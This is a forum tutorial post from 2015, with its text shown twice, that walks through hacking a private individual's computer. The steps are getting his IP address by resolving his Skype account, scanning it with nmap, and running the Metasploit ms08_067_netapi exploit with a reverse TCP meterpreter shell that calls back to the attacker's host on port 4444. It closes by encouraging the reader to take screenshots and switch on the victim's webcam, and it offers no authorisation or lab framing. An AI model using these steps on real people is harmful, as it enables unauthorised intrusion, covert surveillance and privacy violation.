Show Posts
1
Tutorials / How to combind Metasploit and Nmap in a charming way
« on: January 11, 2015, 06:12:42 pm »
Brief Introduction
Some years ago nmap and an exploit database was enough to rule half the internet.
Today barely no one uses nmap... at all.
All you had to do was to tell a customer you were a 1337 security professional.
Keep in mind that customers only applied patches if it fixed something on the system.
It was common practice not to apply system updates that didn't fix a problem you were experiencing on a system.
- "WTF ARE YOU DOING? YOU MIGHT BREAK SOMETHING!"
Then what you had to do was to scan the customer network with nmap, ISS or Nessus.
Because they didn't add patches and updates there was loads of vulnerabilities on the systems, and from there you break out your 1337 tools and you pwn it all.
Today is way different, you'd never port scan and there's so much more you have to find your way through, e.g firewalls, anti-viruses and stuff like that.
Most people would rather go through the web app and look for common vulnerabilities in there such as SQL injection, cross-site scripting, etc.
Today I'm bringing the old days back, and I'm going to teach you how to hack yourself into networks, and make all the boxes yours.
The Interesting part
So, I'm going to asume you already have Linux, Metasploit and Nmap installed.
Let's say your target is John. John has a Skype account which you know of, so what you do is you successfully Skype resolve him and you get his current IP address; 90.230.176.9.
Now open up your Linux terminal and put the following command in
If the host is up you'll hopefully get some ports back that are open.
Cool. We have a couple of open ports on Johns network.
What we need to do is to find the outdated service so we can exploit it. To do this you have to look for the service name in different exploit databases.
For this tutorial I'm using www.metasploit.com. Now I go to the search box and search for Microsoft-DS.
Holy sh-, we got a result:
ms08_067_netapi
At this point Johns network is not looking good, but it gets better.
For the next step, write the command "msfconsole" and wait a moment.
When it opens up write: use (exploit name). For John here, the exploit name is going to be ms08_067_netapi.
Let's set some stuff and configure the exploit, do this by writing the following command:
Here we need to set the RHOST (Remote Host) which is Johns IP address.
And here we need to set the payload. The payload is basically like a bomb, someone has to carry it inside and blow it up.
I'm going to use a reverse TCP meterpreter shell.
Now we're set. Let's exploit this and own John by typing the following command:
Now you should hopefully have a meterpreter session running, and this works about the same way as netcat does.
That's it, take screenshots, put his webcam on, do whatever; all his boxes are belong to us.
Related:
https://www.youtube.com/watch?v=0fbBwGAuINw
Some years ago nmap and an exploit database was enough to rule half the internet.
Today barely no one uses nmap... at all.
All you had to do was to tell a customer you were a 1337 security professional.
Keep in mind that customers only applied patches if it fixed something on the system.
It was common practice not to apply system updates that didn't fix a problem you were experiencing on a system.
- "WTF ARE YOU DOING? YOU MIGHT BREAK SOMETHING!"
Then what you had to do was to scan the customer network with nmap, ISS or Nessus.
Because they didn't add patches and updates there was loads of vulnerabilities on the systems, and from there you break out your 1337 tools and you pwn it all.
Today is way different, you'd never port scan and there's so much more you have to find your way through, e.g firewalls, anti-viruses and stuff like that.
Most people would rather go through the web app and look for common vulnerabilities in there such as SQL injection, cross-site scripting, etc.
Today I'm bringing the old days back, and I'm going to teach you how to hack yourself into networks, and make all the boxes yours.
The Interesting part
So, I'm going to asume you already have Linux, Metasploit and Nmap installed.
Let's say your target is John. John has a Skype account which you know of, so what you do is you successfully Skype resolve him and you get his current IP address; 90.230.176.9.
Now open up your Linux terminal and put the following command in
Code: [Select]
nmap 90.230.176.9 -sVNow, in your case you're obviously going to change the IP address to whatever your target is.If the host is up you'll hopefully get some ports back that are open.
Code: [Select]
Starting Nmap 5.21 ( http://nmap.org ) at 2015-01-04 20:05 GMT
Nmap scan report for (90.230.176.9)
Host is up (0.0017s latency).
Not shown: 994 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain pdnsd
80/tcp open tcpwrapped
443/tcp open tcpwrapped
445/tcp open Microsoft-DS
8000/tcp open http-alt?
9001/tcp closed tor-orport
Cool. We have a couple of open ports on Johns network.
What we need to do is to find the outdated service so we can exploit it. To do this you have to look for the service name in different exploit databases.
For this tutorial I'm using www.metasploit.com. Now I go to the search box and search for Microsoft-DS.
Holy sh-, we got a result:
ms08_067_netapi
At this point Johns network is not looking good, but it gets better.
For the next step, write the command "msfconsole" and wait a moment.
When it opens up write: use (exploit name). For John here, the exploit name is going to be ms08_067_netapi.
Let's set some stuff and configure the exploit, do this by writing the following command:
Code: [Select]
show optionsHere we need to set the RHOST (Remote Host) which is Johns IP address.
Code: [Select]
set rhost 90.230.176.9And here we need to set the payload. The payload is basically like a bomb, someone has to carry it inside and blow it up.
I'm going to use a reverse TCP meterpreter shell.
Code: [Select]
set payload windows/meterpreter/reverse_tcpLet's set the LHOST and LPORT, which is my IP address and port we're going to listen for the meterpreter shell on.Code: [Select]
set lhost (my IP)Code: [Select]
set lport 4444(Keep in mind that John is outside my network, which means that I have to portforward port 4444)Now we're set. Let's exploit this and own John by typing the following command:
Code: [Select]
exploitNow you should hopefully have a meterpreter session running, and this works about the same way as netcat does.
That's it, take screenshots, put his webcam on, do whatever; all his boxes are belong to us.
Related:
https://www.youtube.com/watch?v=0fbBwGAuINw